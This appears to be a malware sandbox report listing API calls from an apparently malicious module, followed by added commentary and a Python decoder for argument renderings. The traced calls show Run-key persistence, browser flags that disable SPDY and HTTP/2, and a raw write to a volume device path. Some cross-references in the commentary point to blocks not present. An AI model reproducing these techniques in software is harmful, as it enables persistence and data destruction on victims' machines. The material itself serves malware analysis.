  • Part of subcall function 00461E71: RegCloseKey.ADVAPI32(?,?,00000000,?,?,?,?,?,004413AA,00464A70,?,00000001), ref: 00461FD6
• lstrcmp.KERNEL32(?,?), ref: 004413F8
• HeapFree.KERNEL32(00000000,?), ref: 00441424
• GetCurrentThreadId.KERNEL32 ref: 004414CA
• GetCurrentThread.KERNEL32 ref: 004414DB
• HeapFree.KERNEL32(00000000,00000000,?,?,00000000,?,00464A70,?,00000001), ref: 00441518
• HeapFree.KERNEL32(00000000,?,?,?,00000000,?,00464A70,?,00000001), ref: 0044152C
• RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0044153A
• wsprintfA.USER32 ref: 0044154B
• lstrlen.KERNEL32(00000000,00000000), ref: 00441556
  • Part of subcall function 00447913: lstrlen.KERNEL32(?,00000000,00466A4C,74B05520,0045D37E,?,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 0044791D
  • Part of subcall function 00447913: lstrcpy.KERNEL32(00000000,?), ref: 00447941
  • Part of subcall function 00447913: StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,00441506,?,?,00000000,?,00464A70,?,00000001), ref: 00447948
  • Part of subcall function 00447913: lstrcat.KERNEL32(00000000,00000001), ref: 0044799F
• HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00441570
• HeapFree.KERNEL32(00000000,00000000), ref: 00441581
• HeapFree.KERNEL32(00000000,?), ref: 0044158D
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
• String ID: 7gF$DLL load status: %u
• API String ID: 773763258-916204935
• Opcode ID: 08c891ebfc526e84645649360398c37a1d53445c6b0fb3645f4719555b3e039c
• Instruction ID: 1748b7ae483a9930e2ce16c1c1f92f51e29ed1b2845d3c1b3ceb2a223398d11a
• Opcode Fuzzy Hash: 08c891ebfc526e84645649360398c37a1d53445c6b0fb3645f4719555b3e039c
• Instruction Fuzzy Hash: E0712471D00119EFDB11DFA5DC84AEEBBB5FF08340F04402AE505A7260EB74AA85DB59
Uniqueness
Uniqueness Score: -1.00%

APIs
• RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 00450540
  • Part of subcall function 00444AED: RegCloseKey.ADVAPI32(?), ref: 00444B74
• RegOpenKeyA.ADVAPI32(80000001,?,00000000), ref: 0045057B
• lstrcpyW.KERNEL32(-00000002,?), ref: 004505DC
• lstrcatW.KERNEL32(00000000,.exe), ref: 004505EA
• lstrcpyW.KERNEL32(?), ref: 00450604
• lstrcatW.KERNEL32(00000000,.dll), ref: 0045060C
  • Part of subcall function 004421BA: lstrlenW.KERNEL32(00001000,.dll,00000000,00000000,00462CFE,00000000,.dll,00000000,00001000,00000000,00000000,?), ref: 004421C8
  • Part of subcall function 004421BA: lstrlen.KERNEL32(DllRegisterServer), ref: 004421D6
  • Part of subcall function 004421BA: RtlAllocateHeap.NTDLL(00000000,00000022), ref: 004421EB
• RegCloseKey.ADVAPI32(?,?,?,00000000,?), ref: 0045066A
  • Part of subcall function 00450CB4: lstrlenW.KERNEL32(?,00000000,00000000,74B05520,?,?,004424EC,?), ref: 00450CC0
  • Part of subcall function 00450CB4: memcpy.NTDLL(00000000,?,00000000,00000002,?,?,004424EC,?), ref: 00450CE8
  • Part of subcall function 00450CB4: memset.NTDLL ref: 00450CFA
• CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000080,00000000,00000000,00000000,00000000,?), ref: 0045069F
• GetLastError.KERNEL32 ref: 004506AA
• HeapFree.KERNEL32(00000000,00000000), ref: 004506C0
• RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,?), ref: 004506D2
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Closelstrlen$HeapOpenlstrcatlstrcpy$AllocateCreateErrorFileFreeLastmemcpymemset
• String ID: .dll$.exe$Software\Microsoft\Windows\CurrentVersion\Run
• API String ID: 1430934453-2351516416
• Opcode ID: d7d1602ef875e655a0d0c7ac9e63fe37ecdc8d17b826dade025dd8d9b23d8ce0
• Instruction ID: 08d89b61e5a0d368ad29bdcb675fc7fa4adfb91809c39b7f11fef3f7e671e20c
• Opcode Fuzzy Hash: d7d1602ef875e655a0d0c7ac9e63fe37ecdc8d17b826dade025dd8d9b23d8ce0
• Instruction Fuzzy Hash: B641D479900219FBDB119BA1CD00EAF7BB9FF45305F10052AFC00A2162E7789A15DB9E
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00458DE2: RtlAllocateHeap.NTDLL(00000000,?,00449CAD), ref: 00458DEE
• memset.NTDLL ref: 0044536D
• StrChrA.SHLWAPI(?,0000000D), ref: 004453B3
• StrChrA.SHLWAPI(?,0000000A), ref: 004453C0
• StrChrA.SHLWAPI(?,0000007C), ref: 004453E7
• StrTrimA.SHLWAPI(?,0046A48C), ref: 004453FC
• StrChrA.SHLWAPI(?,0000003D), ref: 00445405
• StrTrimA.SHLWAPI(00000001,0046A48C), ref: 0044541B
• _strupr.NTDLL ref: 00445422
• StrTrimA.SHLWAPI(?,?), ref: 0044542F
• memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 00445477
• lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 00445496
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
• String ID: $;
• API String ID: 4019332941-73438061
• Opcode ID: 1e95fdf9a0d08671b53ba81f2d90788ddd52ad8c828a8302fee044afa83f6236
• Instruction ID: 70e04a491bb3872518e0162f1e763664c1f7c1277c763c11a1b113fb281dbfb1
• Opcode Fuzzy Hash: 1e95fdf9a0d08671b53ba81f2d90788ddd52ad8c828a8302fee044afa83f6236
• Instruction Fuzzy Hash: C541E6716087059FEB11DF298C45B1BBBE8EF54701F04091EF8899B342EBB8D945CB6A
Uniqueness
Uniqueness Score: -1.00%

APIs
• lstrlen.KERNEL32(00000000,74B05520,?,00000000,?,?,?), ref: 00443668
• lstrlen.KERNEL32(?), ref: 0044366E
• RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0044367E
• lstrcpy.KERNEL32(00000000,?), ref: 00443698
• lstrlen.KERNEL32(?), ref: 004436B0
• lstrlen.KERNEL32(?), ref: 004436BE
• HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 0044370C
• lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 00443730
• lstrlen.KERNEL32(?), ref: 0044375E
• HeapFree.KERNEL32(00000000,?,?), ref: 00443789
• HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 004437A0
• HeapFree.KERNEL32(00000000,?,?), ref: 004437AD
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: lstrlen$Heap$Free$Allocatelstrcpy
• String ID: http
• API String ID: 904523553-2541227442
• Opcode ID: ca9e70d0c2b20667fbce941a6e31a98440e17db6cb646693b006299960a511ac
• Instruction ID: 438136bc1a600b5d6e2d84541ac2f67f4ce94ea3de49c6a004b6bd04be55dd70
• Opcode Fuzzy Hash: ca9e70d0c2b20667fbce941a6e31a98440e17db6cb646693b006299960a511ac
• Instruction Fuzzy Hash: FF41B1B1A00209BFEF21DFA1CC84A9E7BB9FF08705F108426F51596261EB759E10DF28
Uniqueness
Uniqueness Score: -1.00%

APIs
• PathFindFileNameW.SHLWAPI(?), ref: 004581CA
• PathFindFileNameW.SHLWAPI(?), ref: 004581E0
• lstrlenW.KERNEL32(00000000), ref: 00458223
• RtlAllocateHeap.NTDLL(00000000,004667AE), ref: 00458239
• memcpy.NTDLL(00000000,00000000,004667AC), ref: 0045824C
• _wcsupr.NTDLL ref: 00458257
• lstrlenW.KERNEL32(?,004667AC), ref: 00458290
• RtlAllocateHeap.NTDLL(00000000,?,004667AC), ref: 004582A5
• lstrcpyW.KERNEL32(00000000,?), ref: 004582BB
• lstrcatW.KERNEL32(00000000, --use-spdy=off --disable-http2), ref: 004582D9
• HeapFree.KERNEL32(00000000,00000000), ref: 004582E8
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Heap$AllocateFileFindNamePathlstrlen$Free_wcsuprlstrcatlstrcpymemcpy
                                                                                                                                        • String ID: --use-spdy=off --disable-http2$.hF
                                                                                                                                        • API String ID: 3868788785-1139348283
                                                                                                                                        • Opcode ID: 7ff44e486e1989a441d3eca23a76572693e0e2cd638d1c31d57cd11daf0242b8
                                                                                                                                        • Instruction ID: e0d168d5b2fe97d1a777554eabf64f1052c964e008a46362560d80c52565cd00
                                                                                                                                        • Opcode Fuzzy Hash: 7ff44e486e1989a441d3eca23a76572693e0e2cd638d1c31d57cd11daf0242b8
                                                                                                                                        • Instruction Fuzzy Hash: 0B313F32500704ABC3205FA4DC4492F7F69EB55722F15056FFD11E2292EFB89C49875E
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 0045E84E
                                                                                                                                        • GetTempPathA.KERNEL32(00000000,00000000,?,?,004608E9,00000094,00000000,00000000), ref: 0045E866
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000011), ref: 0045E875
                                                                                                                                        • GetTempPathA.KERNEL32(00000001,00000000,?,?,004608E9,00000094,00000000,00000000), ref: 0045E888
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0045E88C
                                                                                                                                        • wsprintfA.USER32 ref: 0045E89C
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 0045E8D0
                                                                                                                                        • StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 0045E8E8
                                                                                                                                        • lstrlen.KERNEL32(00000000), ref: 0045E8F2
                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0045E90E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0045E91C
                                                                                                                                        Strings
                                                                                                                                        • Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 0045E8C6
                                                                                                                                        • %lu.exe, xrefs: 0045E896
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTicklstrlenwsprintf
                                                                                                                                        • String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                        • API String ID: 1404517112-2576086316
                                                                                                                                        • Opcode ID: 27b8c997346d2fc42b01e1cc73fb4cc5ae76f69e90ce9a6125aa254fdeaf64c1
                                                                                                                                        • Instruction ID: bdcd0034ad6c94f5f8019f9e67677b5c88a35008e701dcf178e9c476c3bcd8af
                                                                                                                                        • Opcode Fuzzy Hash: 27b8c997346d2fc42b01e1cc73fb4cc5ae76f69e90ce9a6125aa254fdeaf64c1
                                                                                                                                        • Instruction Fuzzy Hash: BB216DB1900208FFDB115FA2DC88DAF7F6CEF05395B114036F90592111EBB58E49CAAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                        • String ID: *LD$8jF$PG$\gF$zlF
                                                                                                                                        • API String ID: 1279760036-3567566356
                                                                                                                                        • Opcode ID: e4fa8d7cc3e79d5cf4b329d0cad357e72b574f8d501beae86499f920af4b84e4
                                                                                                                                        • Instruction ID: 98c303ccefd318f8946966fe289bfa51ae12c4b9df43f11257b4408b08297f8b
                                                                                                                                        • Opcode Fuzzy Hash: e4fa8d7cc3e79d5cf4b329d0cad357e72b574f8d501beae86499f920af4b84e4
                                                                                                                                        • Instruction Fuzzy Hash: 0AA14835D00209EFDF22DF95CC05AEEBBB5FF05306F00406AE911A2261D7799E99DB19
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 0046233A
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,20000920,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462353
                                                                                                                                        • StrChrA.SHLWAPI(?,0000002C,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 0046235E
                                                                                                                                        • StrTrimA.SHLWAPI(00000001,20000920,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462377
                                                                                                                                        • lstrlen.KERNEL32(00000000,?,00000001,?,?,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462420
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00462442
                                                                                                                                        • lstrcpy.KERNEL32(00000020,?), ref: 00462461
                                                                                                                                        • lstrlen.KERNEL32(?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 0046246B
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 004624AC
                                                                                                                                        • memcpy.NTDLL(?,?,?,?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 004624BF
                                                                                                                                        • SwitchToThread.KERNEL32(00000057,00000000,?,0000012C,?,?,?,?,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 004624E3
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,0000012C,?,?,?,?,?,00000000,0044777D,?,00000004,0000012C), ref: 00462502
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462528
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000001,?,00000001,?,?,00000000,?,00000000,0044777D,?,00000004,0000012C,00000000,00000057), ref: 00462544
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3323474148-0
                                                                                                                                        • Opcode ID: 88159348779a0646909cb28fd105e0649e22e489ad1ee3e5f91e33e895372b3a
                                                                                                                                        • Instruction ID: cd984033c2a1b26ac68fe09def032ff00af3e4726ae86703a43d9b6e6cf33cf7
                                                                                                                                        • Opcode Fuzzy Hash: 88159348779a0646909cb28fd105e0649e22e489ad1ee3e5f91e33e895372b3a
                                                                                                                                        • Instruction Fuzzy Hash: 30716A31504701AFD721DF25CD45A5BBBE8BF48304F04492EF989D2261E7B8E989CB9B
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000104,74B05520), ref: 0044EFFC
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000104), ref: 0044F011
                                                                                                                                        • RegCreateKeyA.ADVAPI32(80000001,?), ref: 0044F039
                                                                                                                                        • HeapFree.KERNEL32(00000000,?), ref: 0044F07A
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000), ref: 0044F08A
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,004436F5), ref: 0044F09D
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,004436F5), ref: 0044F0AC
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,004436F5,00000000,?,?,?), ref: 0044F0F6
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,004436F5,00000000,?,?,?), ref: 0044F11A
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,004436F5,00000000,?,?), ref: 0044F13F
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,004436F5,00000000,?,?), ref: 0044F154
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$Allocate$CloseCreate
                                                                                                                                        • String ID: jjF
                                                                                                                                        • API String ID: 4126010716-3131895916
                                                                                                                                        • Opcode ID: 1a35956cce3f7f415e56bc7ec92e561e25ae04e40556d5c70b25100887365c2e
                                                                                                                                        • Instruction ID: c6eeb4b23e65c5f193751e5163a0aa72c443a9f507d8ef756c5cdb44e7ee5231
                                                                                                                                        • Opcode Fuzzy Hash: 1a35956cce3f7f415e56bc7ec92e561e25ae04e40556d5c70b25100887365c2e
                                                                                                                                        • Instruction Fuzzy Hash: A351D1B5D00249EFDF019F94DD808EEBBB9FB08344F10447AE509A2220E7759E98DF69
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RtlImageNtHeader.NTDLL(00000000), ref: 00458EFA
                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00458F10
                                                                                                                                        • GetCurrentThread.KERNEL32 ref: 00458F21
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
                                                                                                                                          • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
                                                                                                                                          • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
                                                                                                                                          • Part of subcall function 004606D4: GetSystemTimeAsFileTime.KERNEL32(00000F00,?,?,?,?,?,?,00453762,00000F00), ref: 00460718
                                                                                                                                          • Part of subcall function 004606D4: GetTempFileNameA.KERNEL32(00000000,00000000,00000F00,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 00460726
                                                                                                                                          • Part of subcall function 004606D4: lstrcpy.KERNEL32(00000000), ref: 00460748
                                                                                                                                          • Part of subcall function 0044E3F6: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00458F68,00000020,00000000,?,00000000), ref: 0044E461
                                                                                                                                          • Part of subcall function 0044E3F6: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,00458F68,00000020,00000000,?,00000000), ref: 0044E489
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00458F96
                                                                                                                                        • HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 00458FA6
                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 00458FF2
                                                                                                                                        • wsprintfA.USER32 ref: 00459003
                                                                                                                                        • lstrlen.KERNEL32(00000000,00000000), ref: 0045900E
                                                                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 00459028
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
                                                                                                                                        • String ID: DLL load status: %u$PluginRegisterCallbacks$W
                                                                                                                                        • API String ID: 630447368-2893651616
                                                                                                                                        • Opcode ID: e2040519ce1de86b0534e2394038116c96c0363b4977089a13086c644343b68e
                                                                                                                                        • Instruction ID: 666d2c759840f7ac01acc179677995d63e6d1cba7bb75ceefc6333365b51d28e
                                                                                                                                        • Opcode Fuzzy Hash: e2040519ce1de86b0534e2394038116c96c0363b4977089a13086c644343b68e
                                                                                                                                        • Instruction Fuzzy Hash: A641B271901119FBCB119F61DC44DAF7F79EF08345B10442AF905A2262EFB88958DBAA
                                                                                                                                        Uniqueness

                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 00442406
                                                                                                                                          • Part of subcall function 00444AED: RegCloseKey.ADVAPI32(?), ref: 00444B74
• lstrcmpiW.KERNEL32(?,?,?,?,00000000), ref: 0044243E
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 0044244F
• RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 0044248A
• RegCloseKey.ADVAPI32(?), ref: 004424B5
• RtlEnterCriticalSection.NTDLL(00000000), ref: 004424CB
• HeapFree.KERNEL32(00000000,?), ref: 004424E0
• RtlLeaveCriticalSection.NTDLL(00000000), ref: 004424F0
• HeapFree.KERNEL32(00000000,?), ref: 00442505
• RegCloseKey.ADVAPI32(?), ref: 0044250A
Strings
• Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 004423F6
• VjF, xrefs: 00442469
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: Close$CriticalFreeHeapSection$CreateEnterLeaveOpenlstrcmpilstrlen
• String ID: Software\Microsoft\Windows\CurrentVersion\Run$VjF
• API String ID: 4138089493-3424450790
• Opcode ID: 1c5ff672c556749f881eff26ad64f6416b3d25e78aa249670dadfa877e179a22
• Instruction ID: 54ed992542c169cdf8bb4fcb49babd47a098f9d5e00b8de1cb0baa0a3031036e
• Opcode Fuzzy Hash: 1c5ff672c556749f881eff26ad64f6416b3d25e78aa249670dadfa877e179a22
• Instruction Fuzzy Hash: 71317975E00108FFEB119FA5DD48CAEBBB9FB48704B414066F904E2120E7B59E44DF69
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0044FEC3
• GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FED5
• StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FEE2
• wsprintfA.USER32 ref: 0044FEF6
• CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FF0C
• GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0044FF25
• WriteFile.KERNEL32(00000000,00000000), ref: 0044FF2D
• GetLastError.KERNEL32 ref: 0044FF3B
• CloseHandle.KERNEL32(00000000), ref: 0044FF44
• GetLastError.KERNEL32(?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FF55
• HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00460A69,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0044FF65
Strings
Memory Dump Source
• Source File: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, Offset: 00440000, based on PE: false
Yara matches
Similarity
• API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
• String ID: \\.\%s
• API String ID: 3873609385-869905501
• Opcode ID: 2a82f6028d28dca07a9ef7daad5ed487de539abec159e86a734ba9cec0606d43
• Instruction ID: eda39bd70339bf9b4d9ac1a79e686c6aadb55d19b3cef92eec0db8de9ce47f86
• Opcode Fuzzy Hash: 2a82f6028d28dca07a9ef7daad5ed487de539abec159e86a734ba9cec0606d43
• Instruction Fuzzy Hash: 4F11A271645214BFE2202B60AC4CF7B3B5CEB06769F05063AFA0691191FEA41D4D817E
Uniqueness

Uniqueness Score: -1.00%
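
Two renderings in these blocks are easy to misread. In the Run-key block, RegCreateKeyA is shown with 54464F53 as its second argument; as a little-endian dword that is the bytes 53 4F 46 54, "SOFT", the start of the Software\Microsoft\Windows\CurrentVersion\Run string listed under Strings, printed as if it were an integer. The short String ID values VjF, RgF and LjF elsewhere in the report are the opposite artifact: their bytes read as a little-endian dword are 00466A56, 00466752 and 00466A4C, addresses in the same 0046xxxx range as the code in this dump (compare 00463722 and 004606D4), so they are pointer values shown as text. In the block above, CreateFileA's arguments C0000000/00000003/00000003 are GENERIC_READ|GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE and OPEN_EXISTING, applied to a path built with the \\.\%s format from GetWindowsDirectoryA output after the StrChrA search for 0x3A (':'); no SetFilePointer appears between CreateFileA and the WriteFile in this listing, so the write targets offset 0 of that device. The 00000002 shown as the file-name argument is not a plausible pointer and should be read as a static stack-slot guess. The Python below is an added example, not part of the report or of Joe Sandbox, that reverses these renderings; the Win32 constants are the documented values, and the 00440000-00470000 module range is an assumption taken from the dump offset.

```python
"""Decode argument values the way Joe Sandbox renders them in API-call lines.

Added example, not part of the report or of Joe Sandbox. The constants are the
documented Win32 values; the module address range is an assumption taken from
the memory dump offset (00440000) shown in the blocks.
"""
import struct
from typing import Dict, List, Optional

ACCESS_NAMES = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_NAMES = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION_NAMES = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                     4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
HKEY_NAMES = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}


def flag_names(value: int, table: Dict[int, str]) -> str:
    """Render a bit mask as OR-ed constant names; bits not in the table stay as hex."""
    names = [n for bit, n in table.items() if value & bit]
    rest = value & ~sum(table)
    if rest:
        names.append(hex(rest))
    return "|".join(names) or "0"


def decode_createfile(args: List[str]) -> Dict[str, str]:
    """args as the sandbox prints them (hex strings) for CreateFileA/W:
    (lpFileName, dwDesiredAccess, dwShareMode, lpSecurityAttributes,
     dwCreationDisposition, ...). Returns the three security-relevant fields."""
    access, share, disp = (int(args[i], 16) for i in (1, 2, 4))
    return {"access": flag_names(access, ACCESS_NAMES),
            "share": flag_names(share, SHARE_NAMES),
            "disposition": DISPOSITION_NAMES.get(disp, hex(disp))}


def decode_hkey(hexword: str) -> str:
    """Root key handle of RegOpenKey/RegCreateKey, e.g. 80000001 -> HKEY_CURRENT_USER."""
    return HKEY_NAMES.get(int(hexword, 16), hexword)


def dword_as_ascii(hexword: str) -> Optional[str]:
    """A 32-bit argument printed as a number may really be the first four bytes of
    the string that a pointer argument points to (little-endian byte order)."""
    raw = struct.pack("<I", int(hexword, 16))
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    return None


def string_as_pointer(s: str, lo: int = 0x00440000, hi: int = 0x00470000) -> Optional[int]:
    """The inverse artifact: a 1-3 character 'string' whose bytes, read as a
    little-endian dword, land inside the dumped module is a pointer, not a string.
    The [lo, hi) range is an assumption based on the dump offset 00440000."""
    if not 1 <= len(s) <= 3:
        return None
    addr = struct.unpack("<I", s.encode("latin-1").ljust(4, b"\0"))[0]
    return addr if lo <= addr < hi else None


if __name__ == "__main__":
    # Values taken from the Run-key and device-path blocks of the report.
    print(decode_hkey("80000001"), dword_as_ascii("54464F53"))
    print(hex(string_as_pointer("VjF") or 0))
    print(decode_createfile(["00000002", "C0000000", "00000003", "00000000", "00000003"]))
```

The CreateFileW in the later block (0046088E,80000000,00000003,0046E0F8,00000003,...) decodes with the same function to GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING; there the first argument is a real pointer into the dump, which is what the string_as_pointer range check is meant to separate from genuine short strings such as Blocked or HIDDEN.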

APIs
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,?,?,?,?,?,?,00453762,00000F00), ref: 004606E6
  • Part of subcall function 004606D4: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,?,?,?,00453762,00000F00), ref: 004606FF
  • Part of subcall function 004606D4: GetCurrentThreadId.KERNEL32 ref: 0046070C
